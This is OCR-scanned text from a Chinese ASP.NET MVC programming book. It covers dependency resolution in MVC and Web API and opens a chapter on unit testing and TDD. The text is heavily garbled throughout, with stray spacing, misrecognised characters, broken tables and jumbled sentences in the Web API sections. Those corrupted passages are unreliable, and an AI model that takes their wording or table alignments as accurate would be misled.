注入 容器 ， 可 以 查阅 在 线 文档 ， 上 面 介绍 了 如 何 进行 这 些 高 级 特性 的 配置 。 
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13.2 MVC 中 的 依赖 解析 


E 


已 经 讨论 了 控制 反 转 的 基础 内 容 ， 下 面 继续 探讨 它 在 ASPNET MVC 中 的 应 用 。 


(D) — 注意 术 率 只 是 讲解 向 ASPNETMVC 提 供 服务 的 原理 机 制 ， 而 不 讲解 如 何 | 
实现 这 些 具体 的 服务 ; 如 果 想 学 习 服 务 的 实现 ， 请 参阅 第 15 章 。 | 


ASPNET MVC 与 容器 交互 的 主要 方式 就 是 通过 为 ASPNET MVC 应 用 程序 创建 的 一 个 接 
: IDependency Resolver。 该 接口 的 定义 如 下 : 


public interface IDependencyResolver 
{ 
object GetService(Type serviceType); 
IEnumerable«object» GetServices(Type serviceType); 
) 
该 接口 由 ASPNET MVC 框 架 本 身 使 用 。 当 注册 一 个 依赖 注入 容器 (或 服务 定位 器 ) 时 ， 我 
们 就 需要 实现 该 接口 。 通 常 可 在 Global.asax 文 件 中 注册 一 个 解析 器 实例 ， 代 码 如 下 : 


DependencyResolver.Current = new MyDependencyResolver(); 


使 用 NuGet 得 到 容器 


如 果 能 在 使 用 依赖 注入 时 ， 免 去 IDependencyResolver 接 口 的 实现 就 完美 了 ， 值 得 庆幸 的 


是 ，NuGet 能 够 做 到 这 一 点 。 

NuGet 是 ASPNET MVC 中 包含 的 包 管理 器 。 它 可 以 使 我 们 毫 不 费力 地 添加 对 常见 Web 
开源 项 目的 引用 。 想 了 解 NuGet 的 更 多 内 容 ， 请 参见 本 书 第 10 章 内 容 。 

在 撰写 本 文 时 ， 在 NuGet 上 查找 像 “IoC” 和 “dependency” 这 类 短语 ， 会 找到 一 些 可 下 
载 的 依赖 注入 容器 。 大 部 分 的 容器 都 有 一 个 对 应 的 ASPNET MVC 支 持 包 ,也 就 是 说 ,它们 能 
捆绑 IDependencyResolver 接 口 的 一 个 实现 。 


由 于 之 前 的 ASPNET MVC 版 本 中 没有 依赖 解析 器 这 样 的 概念 ， 所 以 解析 器 是 一 个 可 选 
项 ， 默 认 情况 下 ， 创 建 的 项 目 没有 注册 依赖 解析 器 。 如 果 不 需 要 依赖 解析 的 支持 ， 就 可 以 不 
包含 解析 器 。 另 外 ,ASPNETMVC 中 可 以 作为 服务 使 用 的 每 项 内 容 几 乎 都 能 在 解析 器 中 注册 ， 
或 者 用 一 个 传统 的 注册 点 注册 (很 多 情况 下 ， 都 是 这 样 )。 

当 向 ASPNET MVC 框 架 提供 服务 时 ， 可 以 选择 最 适合 我 们 的 注册 模型 。 通 常情 况 下 ， 
当 需 要 服务 时 ，ASPNET MVC 会 首先 咨询 依赖 解析 器 ， 当 在 依赖 解析 器 中 找 不 到 服务 时 ， 它 
再 回头 来 咨询 传统 注册 点 。 

这 里 不 再 展示 向 依赖 解析 器 中 注册 服务 的 代码 。 为 什么 呢 ? 主要 是 因为 使 用 的 注册 API 
依赖 于 我 们 选择 使 用 的 依赖 注入 容器 。 想 了 解 更 多 有 关 容 器 的 注册 和 配置 的 信息 ， 请 查阅 容 
器 类 的 相关 文档 。 

请 注意 ，ASPNET MVC 以 两 种 不 同 的 方式 使 用 服务 ， 因 此， 依赖 解析 接口 上 有 两 个 
方法 。 
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在 应 用 程序 中 应 该 使 用 依赖 解析 器 吗 ? 
我 们 可 能 会 抵挡 不 住 诱 惑 而 在 应 用 程序 中 使 用 IDependencyResolver 接 口 ， 其 实 ， 我 们 应 
该 抗拒 诱惑 。 


依赖 解析 器 接口 有 很 强 的 目的 性 。 它 只 是 MVC 本 身 需 要 的 内 容 ， 除 此 之 外 别 无 其 他 。 它 
并 不 是 要 隐藏 或 替代 依赖 注入 容器 的 传统 API。 大 部 分 的 容器 都 有 复杂 而 有 趣 的 API; 事实 上 ， 
我 们 选择 容器 ， 依 据 的 是 它 所 能 够 提供 的 API 和 特性 ， 而 不 是 其 他 的 原因 。 


13.2.1 MVC 中 的 单一 注册 服务 


用 户 为 MVC 使 用 的 服务 能 且 仅 能 注册 一 个 服务 实例 。 此 类 服务 称 为 单一 注册 服务 
(singly-registered services)， 用 来 从 解析 器 中 检索 单一 注册 服务 的 方法 是 GetService。 
于 所 有 的 单一 注册 服务 ， 在 第 一 次 使 用 时 ，ASPNET MVC 都 会 调用 依赖 解析 器 ， 并 
把 返回 的 结果 缓存 起 来 ， 以 使 应 用 程序 在 其 生命 周期 中 继续 使 用 。 我 们 可 以 选择 使 用 依赖 解 
析 器 API， 也 可 以 选择 使 用 传统 的 注册 API 如 果 可 用 )。 由 于 ASPNET MVC 只 能 使 用 单一 注册 
服务 的 一 个 实例 ， 因 此 ， 我 们 不 能 同时 使 用 依赖 解析 器 API 和 传统 注册 API， 而 只 能 使 用 其 中 
一 本。 

GetService 实 现 方法 要 么 返回 一 个 在 解析 器 中 注册 的 服务 实例 , 要 么 返回 null( 如 果 在 解析 
器 中 找 不 到 要 查找 的 服务 的 话 )。 表 13-1 列 举 了 MVC 中 使 用 的 单一 注册 服务 的 默认 服务 实现 。 
表 13-2 显 示 了 这 些 服务 的 传统 注册 API。 


表 13-1 MVC 中 的 单一 注册 服务 的 默认 服务 实现 


M 


服 5 默认 服务 实现 
IControllerActivator DefaultControllerActivator 
IControllerFactory DefaultControllerFactory 
IViewPageActivator DefaultViewPageActivator 
ModelMetadataProvider DataAnnotationsModelMetadataProvider 
表 13-2 MVC 中 的 单一 注册 服务 的 传统 注册 API 
服 务 传统 注册 API 

IControllerActivator 无 

IControllerFactory ControllerBuilder.Current.SetControllerFactory 

IViewPageActivator X 

ModelMetadataProvider ModelMetadataProviders.Current 


13.2.2 MVC 中 的 复合 注册 服务 


与 单一 注册 服务 相 比 ，ASPNET MVC 也 使 用 一 些 可 用 来 注册 多 个 服务 实例 的 服务 ， 这 
些 服务 以 竞争 或 联合 的 方式 为 ASPNET MVC 提 供 信 息 。ASPNET MVC 可 以 调用 这 些 复合 注 
有 服务 (multiply-registered services)。 我 们 可 以 使 用 GetServices 方 法 来 从 解析 器 中 检索 复合 注 
服务 。 
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对 于 所 有 的 复合 注册 服务 ， 当 第 一 次 需要 这 些 服务 时 , ASPNET MVC 就 会 调用 依赖 解析 
器 ， 并 把 返回 的 结果 缓存 起 来 ， 以 便 在 应 用 程序 的 生命 周期 中 使 用 。 可 以 结合 使 用 依赖 解析 
器 API 和 传统 的 注册 API， 因 为 ASPNET MVC 在 一 个 合并 的 服务 列表 中 合并 了 二 者 的 结果 。 
在 合并 的 服务 列表 中 ， 使 用 依赖 解析 器 注册 的 服务 的 位 置 要 在 使 用 传统 注册 API 注 册 的 服务 
Bü. 这 些 复合 注册 服务 提供 信息 的 优先 级 非常 重要 ; 也 就 是 说 ， 当 ASPNET MVC 提 供 信息 
时 ， 它 会 遍历 合并 列表 中 的 每 一 个 服务 实例 ， 第 一 个 提供 请 求 信息 的 服务 实例 便 是 ASPNET 
MVC 要 使 用 的 服务 实例 。 

GetServices 方 法 要 么 返回 一 个 在 解析 器 中 注册 的 服务 类 型 的 服务 对 象 集 ， 要 么 返回 一 个 
空 集 (如 果 解 析 器 中 没有 注册 服务 类 型 的 话 )。 

对 于 复合 注册 服务 ，ASPNET MVC 支 持 两 个 复合 服务 模型 ， 如 下 所 示 : 

e 竞争 服务 :使 ASP.NET MVC 框架 按 顺 序 执行 服务 , 并 询问 服务 可 否 执 行 其 主要 功能 。 
响应 并 能 满足 请 求 的 第 一 个 服务 是 ASP.NET MVC 使 用 的 服务 。 通 常情 况 下 ， 
ASP.NET MVC 框架 是 对 请 求 挨个 询问 这 些 问 题 ， 因此 ,每 个 请 求实 际 使 用 的 服务 可 
能 是 不 一 样 的 。 视 图 引擎 服务 便 是 竞争 服务 的 一 个 很 好 的 例子 : 在 一 个 请 求 中 ， 只 有 
单个 视图 引擎 泻 染 视图 。 

e 协作 服务 : ASPNET MVC 框架 请 求 每 个 服务 执行 其 主要 功能 ， 满 足 请 求 的 所 有 服务 
就 会 协作 完成 操作 。 过 滤 提供 器 便 是 协作 服务 很 好 的 一 个 例子 : 每 个 提供 器 可 能 会 为 
请 求 找到 一 个 过 滤器 ， 然 后 执行 提供 器 找到 的 所 有 过 滤器 。 

下 面 的 列表 列举 了 MVC 使 用 的 复合 注册 服务 ， 并 指出 了 它们 之 间 的 竞争 与 合作 关系 。 


服务 : 过 滤 提 供 器 

接口 : IFilterProvider 

传统 注册 API: FilterProviders.Providers 
复合 服务 模型 :协作 

默认 服务 实现 : 

e FilterAttributeFilterProvider 

e GlobalFilterCollection 

® ControllerInstanceFilterProvider 


服务 : 模型 绑 定 器 提供 器 

接口 : IModelBinderProvider 

传统 注册 API: ModelBinderProviders.BinderProviders 
复合 服务 模型 : 竞争 

默认 服务 实现 : 无 


服务 : 视图 引擎 

接口 : IViewEngine 

传统 注册 API: ViewEngines.Engines 
复合 服务 模型 竞争 

默认 服务 实现 : 

e WebFormViewEngine 
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e RazorViewEngine 


服务 : 模型 验证 器 提供 器 

类 型 : ModelValidatorProvider 

传统 注册 API: ModelValidatorProviders.Providers 
复合 服务 模型 : 协作 

默认 服务 实现 : 

e DataAnnotationsModelValidatorProvider 

® DataErrorInfoModelValidatorProvider 

e ClientDataTypeModelValidatorProvider 


服务 : 值 提供 器 工厂 

类 型 ， ValueProviderFactory 

传统 注册 API: ValueProviderFactories.Factories 
复合 服务 模型 :竞争 

默认 服务 实现 : 

e ChildActionValueProviderFactory 
FormValueProviderFactory 
JsonValueProviderFactory 
RouteDataValueProviderFactory 
QueryStringValueProviderFactory 
HttpFileCollectionValueProviderFactory 


13.2.3 ”MVC 中 的 任意 对 象 


提示 :“ 该 对 


MVC 中 有 两 个 特殊 的 情形 。 在 这 两 个 情形 中 ，MVC 框 架 请 求 一 个 依赖 解析 器 来 创建 任 
意 对 象 ， 这 些 创建 的 对 象 严格 来 说 不 是 服务 ， 而 是 控制 器 和 视图 页 面 。 

正如 在 前 面 看 到 的 ， 两 个 称 为 激活 器 的 服务 控制 着 控制 器 和 视图 页 面 的 实例 化 。 这 些 激 
活 器 的 默认 实现 要 求 依赖 解析 器 创建 控制 器 和 视图 页 面 ， 如 果 失 败 ， 将 调用 Activator. 
CreateInstance 方 法 。 


1. 创建 控制 器 


如 果 以 前 编写 过 带 有 构造 函数 (有 参数 ) 的 控制 器 ， 就 应 该 知道 在 运行 时 系统 会 有 一 个 异常 


象 未 定义 无 参 构造 函数 "。 在 ASPNET MVC 应 用 程序 中 ， 如 果 我 们 仔细 查看 该 异 


常 的 跟踪 栈 信息 , 就 会 发 现 它 既 包含 DefaultControllerFactory, 也 包含 DefaultController- Activator- 


月 


控制 器 工厂 是 最 终 用 于 负责 将 控制 器 名 称 转换 为 控制 器 对 象 的 ， 
日 的 IControllerActivator 接 口 ， 而 不 是 MVC 本 身 。 在 ASPNETMVC 中 ,默认 的 控制 器 工厂 将 
这 一 转换 过 程 分 为 单独 的 两 个 子 过 程 : 将 控制 器 名 称 映射 为 类 型 以 及 将 类 型 实例 化 为 对 象 。 
其 中 后 一 步骤 由 控制 器 激活 器 负责 。 


因此 ， 是 控制 器 工厂 使 
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自 定义 控制 器 工厂 和 控制 器 激活 器 

由 于 控制 器 工厂 最 终 负 责 将 控制 器 名 称 转换 为 控制 器 对 象 ， 因 此 ， 对 控制 器 工厂 所 做 的 
任何 蔡 换 都 可 能 导致 控制 器 激活 器 不 能 正常 工作 。 在 ASPNETMVC 3 之 前 的 版 本 中 ， 还 没有 
控制 器 激活 器 ,所 以 为 ASPNET MVC 旧 版 本 设计 的 任何 自 定义 控制 器 工厂 不 知道 依赖 解析 器 
和 控制 器 激活 器 。 因 此 ， 当 我 们 编写 新 的 控制 器 工厂 时 ， 应 该 尽 可 能 使 用 控制 器 激活 器 。 


因为 默认 的 控制 器 激活 器 只 要 求 依赖 解析 器 为 我 们 创建 控制 器 ， 所 以 许多 依赖 注入 容器 
自动 地 为 控制 器 实例 提供 依赖 注入 ， 这 是 因为 依赖 注入 容器 被 要 求 创 建 依赖 注入 。 如 果 容 器 
在 没有 预先 配置 的 情况 下 能 够 创建 任意 对 象 ， 我 们 就 不 需要 创建 控制 器 激活 器 ， 而 只 需要 注 
册 依 赖 注 入 容器 就 行 了 。 

然而 ， 如 果 依赖 注入 容器 不 能 创建 任意 对 象 ， 那 么 我 们 不 只 要 注册 依赖 注入 容器 ， 还 要 
实现 激活 器 。 这 就 使 容器 知道 自己 可 能 被 要 求 创建 预先 不 知道 的 任意 类 型 ， 并 允许 采取 任何 
操作 以 确保 能 够 成 功 响应 创建 类 型 的 请 求 。 

控制 器 激活 器 接口 只 包含 一 个 方法 ， 如 下 所 示 : 


public interface IControllerActivator 
{ 


IController Create (RequestContext requestContext, Type controllerType); 
) 


除了 控制 器 类 型 ， 控 制 器 激活 器 还 可 以 访问 RequestContext， 其 中 包括 HttpContext( 包 括 
Session 和 Request) 和 路 由 映射 到 请 求 的 路 由 数据 。 由 于 激活 器 能 够 访问 上 下 文 信息 ， 因 此 ， 
我 们 可 能 选择 实现 控制 器 激活 器 来 帮助 决定 如 何 创建 控制 器 对 象 。 例 如 ， 激 活 器 根据 登录 系 
统 的 用 户 是 不 是 管理 员 来 决定 创建 不 同 的 控制 器 类 。 


2. 创建 视图 


与 控制 器 激活 器 负责 创建 控制 器 实例 一 样 ， 视 图 页 面 激 活 器 负责 创建 视图 页 面 实例 。 同 
样 ， 因 为 这 些 创建 的 类 型 可 能 是 依赖 注入 没有 预先 配置 的 任意 类 型 ， 因 此 ， 激 活 器 给 容器 一 
个 知道 请 求 视图 的 机 会 。 

视图 激活 器 接口 与 控制 器 激活 器 接口 类 似 ， 代 码 如 下 : 

public interface IViewPageActivator 

t 


object Create(ControllerContext controllerContext, Type type); 
} 


这 种 情形 下 ， 视 图 页 面 激 活 器 可 访问 ControllerContext， 其 中 不 仅 包含 RequestContext 和 
HttpContext， 还 包括 对 控制 器 、 模 型 、 视 图 数据 、 临 时 数据 和 当前 控制 器 状态 的 其 他 信息 的 
访问 。 

与 控制 器 激活 器 一 样 ， 视 图 页 面 激活 器 也 是 ASPNET MVC 框 架 间接 使 用 的 类 型 。 在 该 
情形 中 ， 是 BuildManagerViewEngine( 即 WebFormViewEngine 和 RazorViewEngine 的 抽象 基 类 ) 
使 用 视图 页 面 激 活 器 。 

视图 引擎 的 主要 任务 是 把 视图 的 名 称 转换 为 视图 实例 .ASPNET MVC 框 架 把 视图 页 面 对 
象 的 实际 实例 化 任务 分 配给 视图 激活 器 ， 而 把 正确 视图 文件 的 标识 以 及 这 些 文件 的 编译 工作 
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留 给 创建 管理 器 的 视图 引擎 基 类 。 
ASP.NET 的 创建 管理 器 


330 


将 视图 编译 成 类 的 过 程 主要 由 核心 ASPNET 运 行 时 系统 中 一 个 称 为 BuildManager 的 组 件 
负责 。 该 组 件 具有 很 多 功能 ， 其 中 包括 将 后 缀 名 为 aspx 和 .ascx 的 文件 转换 成 Web Forms 应 用 
程序 使 用 的 类 。 

创建 管理 器 系统 是 可 扩展 的 ， 与 ASPNET 核 心 运行 时 系统 一 样 ， 我 们 可 以 利用 它 的 编译 
模型 将 应 用 程序 中 的 输入 文件 编译 成 运行 时 的 类 。 事 实 上 ，ASPNET 核 心 运行 时 系统 并 不 了 
解 Razor; 之 所 以 能 够 将 后 级 名 为 .cshtml 和 .vbhtml 文 件 编译 成 类 ， 是 因为 ASPNET Web Pages 
团队 编写 了 一 个 称 为 “创建 提供 器 ”的 创建 管理 器 扩展 。 

完成 这 一 功能 的 第 三 方 类 库 的 例子 是 早期 发 布 的 Subsonic 项 目 ， 一 个 由 Rob Conery 编 写 
的 对 象 关 系 映射 器 (Object-Relational Mapper，ORM)。 在 这 种 情形 下 ，SubSonic 使 用 一 个 描述 
映射 数据 库 的 文件 ， 在 运行 时 ， 它 再 生成 自动 匹配 数据 库 表 的 ORM 类 。 

在 Visual Studio 中 设计 应 用 程序 时 ,创建 管理 器 就 在 运行 。 因 此 ， 当 编写 应 用 程序 时 ,能 
够 进行 任何 编译 ， 其 中 包括 Visual Studio 中 的 智能 感知 支持 。 


13.3 Web API 中 的 依赖 解析 


新 添加 的 Web API 功 能 (请 参阅 第 11 章 ) 也 支持 依赖 解析 。Web API 中 的 依赖 解析 器 在 设计 
上 与 MVC 的 稍 有 不 同 ， 但 在 原则 上 ,它们 的 目标 是 一 致 的 : 都 能 够 让 开发 人 员 轻 松 地 获取 控 
制 器 的 依赖 注入 ， 同 时 使 得 向 Web API 提 供 服务 变 得 简单 ， 这 里 的 Web API 是 指 通过 依赖 注入 
技术 自 创 建 的 。 

Web API 的 依赖 解析 在 实现 中 有 两 个 显著 差异 。 首 先 ， 没 有 为 服务 默认 注册 的 静态 API;， 由 
于 历史 原因 ， 仍 然 保 留 MVC 中 的 旧 静 态 API。 取 而 代 之 的 是 一 种 松散 类 型 的 服务 定位 器 ， 我 
们 可 以 通过 HttpConfiguration.Services 访 问 ， 这 样 开发 人 员 可 以 列举 ， 蔡 换 Web API 使 用 的 默 
认 服 务 。 

第 二 ， 实 际 的 依赖 解析 器 API 已 经 稍微 修改 ， 以 支持 范围 ccopes) 这 一 概念 。MVC 中 原来 
的 依赖 解析 器 的 一 个 不 足 之 处 是 缺乏 资源 清理 机 制 。 与 社区 协商 之 后 ， 我 们 制定 了 一 个 设计 
方案 ， 使 用 范围 的 概念 作为 Web API 触 发 清理 机 制 的 方式 。 对 每 次 请 求 ， 系 统 自动 创建 一 个 新 
范围 ， 这 个 范围 可 以 通过 HttpRequestMessage 的 扩展 方法 GetDependencyScope 来 获取 。 与 依赖 
解析 器 接口 一 样 ， 范 围 接 口 既 有 GetService 方 法 也 有 GetServices 方 法 ; 区 别 是 从 请 求 本 地 获取 
的 资源 在 请 求 完成 时 会 被 释放 。 

可 通过 HttpConfiguration DependencyResolver, M Web API 获 取 或 者 为 Web API 设 置 依赖 解 
析 器 。 


13.3.1 Web API 中 的 单一 注册 服务 


与 MVC 一 样 ，Web API 也 有 其 本 身 使 用 的 服务 ， 用 户 只 能 注册 一 个 这 种 服务 实例 。 解 析 
器 通过 调用 GetService 可 以 检索 这 些 单一 注册 服务 。 
对 于 所 有 的 单一 注册 服务 ， 在 第 一 次 使 用 时 ，Web API 都 会 调用 依赖 解析 器 ， 并 把 返回 
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的 结果 缓存 起 来 ， 以 使 应 用 程序 在 其 生命 


Web API 就 使 


API 使 用 的 单一 注册 服务 。 


周期 中 继续 使 用 。 当 不 能 在 解析 器 中 找到 服务 时 ， 
HttpConfiguration.Services 提 供 的 默认 服务 列表 中 的 服务 。 表 13-3 列 出 了 Web 


表 13-3 Web API 中 的 单一 注册 服务 


RO 务 默认 服务 实现 
IActionValueBinder DefaultActionValueBinder 
IApiExplorer ApiExplorer 
IAssembliesResolver DefaultAssembliesResolver* 
IBodyModelValidator DefaultBodyModelValidator 
IContentNegotiator DefaultContentNegotiator 
IDocumentationProvider None 
IHostBufferPolicySelector None 
THttpActionInvoker ApiControllerActionInvoker 
THttpActionSelector ApiControllerActionSelector 


THttpControllerActivator 
IHttpControllerSelector 
IHttpControllerTypeResolver 


IIraceManager 


ITraceWriter 
ModelMetadataProvider 
* 当 应 用 程序 在 ASPNET 中 运行 时 ， 蔡 换 为 WebHostAssembliesResolver。 
** 当 应 用 程序 在 ASPNET 中 运行 时 ， 蔡 换 为 WebHostHttpControllerTypeResolver。 


13.3.2 Web API 中 的 复合 注册 服务 


DefaultHttpControllerActivator 
DefaultHttpControllerSelector 
DefaultHttpControllerTypeResolver** 
TraceManager 

None 
CachedDataAnnotationsModel-MetadataProvider 


Web API 中 的 复合 注册 服务 也 是 从 MVC 借 用 的 概念 ， 可 以 把 依赖 解析 器 中 列举 的 服务 和 
HttpConfiguration.Services 的 服务 结合 起 来 。Web API 可 以 调用 GetServices 方 法 来 从 依赖 解析 器 
中 检索 服务 。 下 面 的 列表 列举 了 Web API 使 用 的 复合 注册 服务 ， 并 指出 了 这 些 服务 之 间 的 合 
作 或 竞争 关系 。 


服务 : 
: IFilterProvider 


接 


过 滤器 提供 器 


复合 服务 模型 : 协作 

默认 服务 实现 : 

e ConfigurationFilterProvider 
e ActionDescriptorFilterProvider 


服务 : 
类 型 : 


模型 绑 定 器 提供 器 
ModelBinderProvider 


复合 服务 模型 : 竞争 
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默认 服务 实现 : 
TypeConverterModelBinderProvider 
TypeMatchModelBinderProvider 
KeyValuePairModelBinderProvider 
ComplexModelIDtoModelBinderProvider 
ArrayModelBinderProvider 
DictionaryModelBinderProvider 
CollectionModelBinderProvider 
MutableObjectModelBinderProvider 


服务 : 模型 验证 器 提供 器 

类 型 ModelValidatorProvider 

复合 服务 模型 : 协作 

默认 服务 实现 : 

e DataAnnotationsModelValidatorProvider 
e DataMemberModelValidatorProvider 

e InvalidModelValidatorProvider 


服务 : 值 提供 器 工厂 

类 型 : ValueProviderFactory 

复合 服务 模型 ， 竞争 

默认 服务 实现 : 

® QueryStringValueProviderFactory 
e RouteDataValueProviderFactory 


13.3.3 Web API 中 的 任意 对 象 


Sow 


13.3.4 XIEEMVC Web APl 中 的 依赖 解析 器 


男 外， 由 
同 的 。 这 就 意味 着 ， 两 个 依赖 解析 器 接口 的 实现 是 不 同 的 ， 


存在 有 三 种 情况 ，Web API 框 架 需 要 请 求 依赖 解析 器 来 创建 任意 对 象 ， 也 就 是 ， 那 些 从 
严格 意义 上 说 不 是 服务 的 对 象 。 与 MVC 一 样 , 控制 器 也 是 这 种 类 型 的 对 象 。 另 外 两 种 情形 是 ， 


[ModelBinder] 特 性 添加 的 模型 绑 定 器 ， 以 及 通过 [HttpControllerConfiguration] 附 加 到 控制 器 
的 服务 。 


与 内 置 的 服务 一 样 , 通过 特性 添加 的 服务 会 在 应 用 程序 的 生命 周期 中 缓存 起 来 , 这 样 Web 
API 就 可 以 从 添加 到 配置 中 的 依赖 解析 器 请 求 这 些 服务 。 从 另 一 方面 来 讲 ， 控 制 器 通常 有 请 
求 范围 的 生命 期 ， 这 样 我 们 就 可 以 从 附加 到 请 求 中 的 范围 来 获取 。 


虽然 MVC 和 Web API 都 拥有 依赖 解析 器 , 但 正如 前 面 介绍 的 , 它们 的 接口 是 存在 区 别 的 。 


于 MVC 和 Web API 没 有 公共 服务 接口 ， 因 此 ， 包 含 在 这 些 依赖 解析 器 中 的 服务 是 不 


能 够 在 Web API 中 工作 ， 反 之 亦 然 。 


因 


此 ， 不 要 期 望 MVC 依 赖 解析 器 
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这 样 同一 个 具体 的 依赖 解析 器 容器 拥有 两 种 依赖 解析 器 接口 实现 版 本 就 非常 合情合理 ， 
因为 这 样 我 们 在 整个 应 用 程序 中 使 用 的 自 定义 服务 都 能 访问 MVC 和 Web API 控 制 器 。 我 们 
可 以 查阅 依赖 注入 容器 文档 来 学 习 如 何在 一 个 包含 MVC 和 Web API 的 应 用 程序 中 使 用 单 
容器 。 


13.4 ”小结 


ASPNET MVC 和 Web API 的 依赖 解析 器 为 Web 应 用 程序 中 的 依赖 注入 提供 了 一 些 令 人 
振奋 的 新 机 遇 。 利 用 它 不 仅 可 以 降低 应 用 程序 设计 的 耦合 程度 ， 还 可 以 使 应 用 程序 具有 更 好 
的 可 插 拔 性 ， 从 而 使 应 用 程序 的 开发 变 得 更 加 灵活 和 强大 。 
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单元 测试 


本 章 主要 内 容 

o 理解 单元 测试 和 测试 驱动 开发 

e 创建 单元 测试 项 目 

e 在 ASP.NET MVC 和 ASP.NET Web API 应 用 程序 中 应 用 单元 测试 时 的 一 些 忠 告 


在 开发 可 测试 软件 的 过 程 中 ， 单 元 测试 已 成 为 确保 软件 质量 的 一 个 不 可 或 缺 部 分 。 大 部 
分 专业 开发 人 员 在 他 们 的 日 常 工 作 中 都 有 自己 的 一 套 单元 测试 方法 。 测 试 驱动 开发 
(Test-Driven Development，TDD) 是 编写 单元 测试 的 一 种 方法 ， 采 用 该 方法 的 开发 人 员 在 编写 
任何 产品 代码 之 前 都 需要 编写 测试 程序 。TDD 人 允许 开发 人 员 以 系统 的 方式 完善 软件 设计 ， 从 
而 可 以 有 效 地 提高 单元 测试 的 质量 ,增加 回归 测试 带 来 的 好 处 。ASPNET MVC 使 用 单元 测试 
来 编写 。 本 章 重点 讲解 单元 测试 (特别 是 TDD) 在 ASPNETMVC 中 的 应 用 。 

考虑 到 有 些 读者 没有 用 过 单元 测试 和 TDD， 本 章 前 半 部 分 包含 了 一 个 对 单元 测试 和 TDD 
的 简短 介绍 ， 作 为 在 实践 中 深层 次 学 习 单元 测试 和 TDD 的 基础 。 单 元 测试 是 一 个 非常 宽泛 的 
主题 。 关 于 它 和 TDD 的 简短 介绍 可 以 作为 入 门 导 引 ， 来 帮助 明确 它们 是 不 是 我 们 想 进一步 学 
习 和 研究 的 内 容 。 

本 章 后 半 部 分 包含 了 一 些 实用 技巧 ， 以 及 这 些 技巧 在 ASPNETMVC 和 Web API 应 用 程序 
单元 测试 的 具体 场合 中 的 应 用 。 从 事 过 单元 测试 开发 ， 并 且 想 从 自己 的 设计 中 学 习 提高 的 开 
发 人 员 可 以 直接 跳 到 本 章 的 后 边 部 分 。 


14.1 单元 测试 和 测试 驱动 开发 的 意义 


当 我 们 谈 到 软件 测试 时 ， 通 常 是 指 进 行 的 一 系列 不 同 种 类 的 测试 ， 包 括 单元 测试 、 验 收 测 
试 (acceptance testing)、 探 索 测 试 (exploratory testing)、 性 能 测试 (performance testing) 和 可 扩展 性 
测试 (scalability testing) 等 。 对 单元 测试 有 一 个 共同 的 理解 是 学 好 本 章 内 容 的 一 个 良好 基础 ， 
也 是 本 节 的 主题 。 
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14.1.1 单元 测试 的 定义 


大 部 分 开发 人 员 都 接触 过 单元 测试 ， 并 且 都 有 一 套 适 用 于 自己 的 最 好 方式 。 根 据 笔者 经 
验 ， 大 部 分 成 功 的 单元 测试 应 用 通常 具有 以 下 4 个 特点 : 

e. 测试 小 部 分 产品 代码 (“单元 ”) 

e 产品 代码 分 块 隔离 测试 

。 只 测试 公共 端点 

o 运行 测试 程序 能 够 得 到 自动 的 结果 : pass/fail 

上 面 的 每 个 规则 以 及 它们 如 何 影响 单元 测试 的 编写 方式 将 在 下 面 介绍 。 


1. 测试 小 部 分 代码 


当 编 写 单元 测试 时 ,我 们 经 常 查找 能 够 合理 测试 的 最 小 功能 片段 。 在 像 C# 一 样 的 面向 对 
象 编程 语言 中 ， 类 通常 就 意味 着 是 最 小 的 功能 片段 ， 但 大 多 数 情况 下 ， 我 们 测试 的 是 类 中 的 
一 个 方法 。 测 试 小 片段 代码 能 使 我 们 快速 地 编写 出 简单 的 测试 程序 。 测 试 程序 需要 简单 且 容 
易 理解 ， 以 便 我 们 能 够 精确 地 验证 编写 的 测试 程序 是 否 符合 要 求 。 

源 代码 的 阅读 次 数 要 远 超过 编写 次 数 ， 这 一 点 在 单元 测试 中 特别 有 用 ， 因 为 单元 测试 要 
测试 软件 的 期 望 规则 和 行为 。 当 单元 测试 失败 时 ， 开 发 人 员 应 该 能 够 快速 地 阅读 测试 程序 ， 
理解 什么 出 错 了 ， 以 及 为 什么 会 出 错 ， 从 而 能 够 快速 地 知道 如 何 修正 出 错 的 地 方 。 使 用 小 的 
测试 程序 来 测试 小 片段 代码 能 够 极 大 地 改善 测试 结果 的 可 理解 性 。 


2. 隔离 测试 


单元 测试 的 另 一 个 重要 方面 就 是 它 还 应 该 能 够 在 问题 出 现时 精确 地 指出 问题 出 现 的 位 
置 。 编 写 代 码 测试 小 功能 片段 是 单元 测试 的 一 个 重要 方面 ， 但 不 是 全 部 。 我 们 还 需要 把 测试 
的 代码 与 和 它 有 交互 的 复杂 代码 隔离 ， 以 确保 出 现 的 故障 一 定 是 在 测试 代码 中 ， 而 不 是 在 与 
其 交互 的 代码 中 。 检 查 交互 的 合作 代码 是 否 存 在 bug 是 合作 代码 单元 测试 的 任务 。 
隔离 测试 还 有 一 个 优点 就 是 与 要 测试 的 程序 交互 的 代码 不 要 求 必须 存在 。 这 对 于 拥有 多 
个 开发 人 员 的 团队 开发 非常 有 用 ;一 些 团队 可 能 处 理 交互 功能 片段 ， 而 另外 一 些 团 队 可 能 同 
时 进行 其 他 功能 片段 的 处 理 , 从 而 实现 项 目的 并 行 开发 。 隔离 地 测试 组 件 不 仅 可 以 在 其 他 组 
件 编写 完毕 之 前 进行 ， 也 可 以 帮助 我 们 更 好 地 理解 组 件 之 间 的 交互 原理 ， 从 而 在 整合 组 件 之 
前 捕获 这 些 可 能 出 现 的 错误 。 


3. 只 测试 公共 端点 


许多 刚 开始 使 用 单元 测试 的 开发 人 员 在 修改 类 的 内 部 实现 时 ， 通 常 感到 很 痛苦 。 对 代码 
的 一 点 儿 修 改 就 可 能 会 导致 多 个 单元 测试 的 失败 。 因 此 ， 在 修改 产品 代码 时 ， 维 护 这 些 单 
元 测试 的 开发 人 员 通 常 感到 很 诅 形 ， 之 所 以 会 这 样 ， 是 因为 单元 测试 对 它 要 测试 的 类 的 工作 
原理 了 解 太 多 。 

当 编 写 单元 测试 时 ， 如 果 仅 局 限于 产品 的 公共 端点 (一 个 组 件 的 集成 点 )， 就 可 以 将 单元 
测试 与 组 件 的 许多 内 部 实现 细节 相隔 离 。 这 样 ， 修 改 实现 细节 就 不 会 经 常 性 地 破坏 我 们 已 经 
编写 好 的 单元 测试 了 。 
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如 果 发 现在 不 获取 一 个 类 的 内 部 信息 的 情况 下 很 难 测试 该 类 ， 通 常 这 意味 着 要 测试 的 类 
完成 了 太 多 任务 。 要 使 该 类 适合 测试 ， 可 能 需要 把 该 类 分 解 成 几 个 较 小 的 类 ， 每 个 类 完成 单 
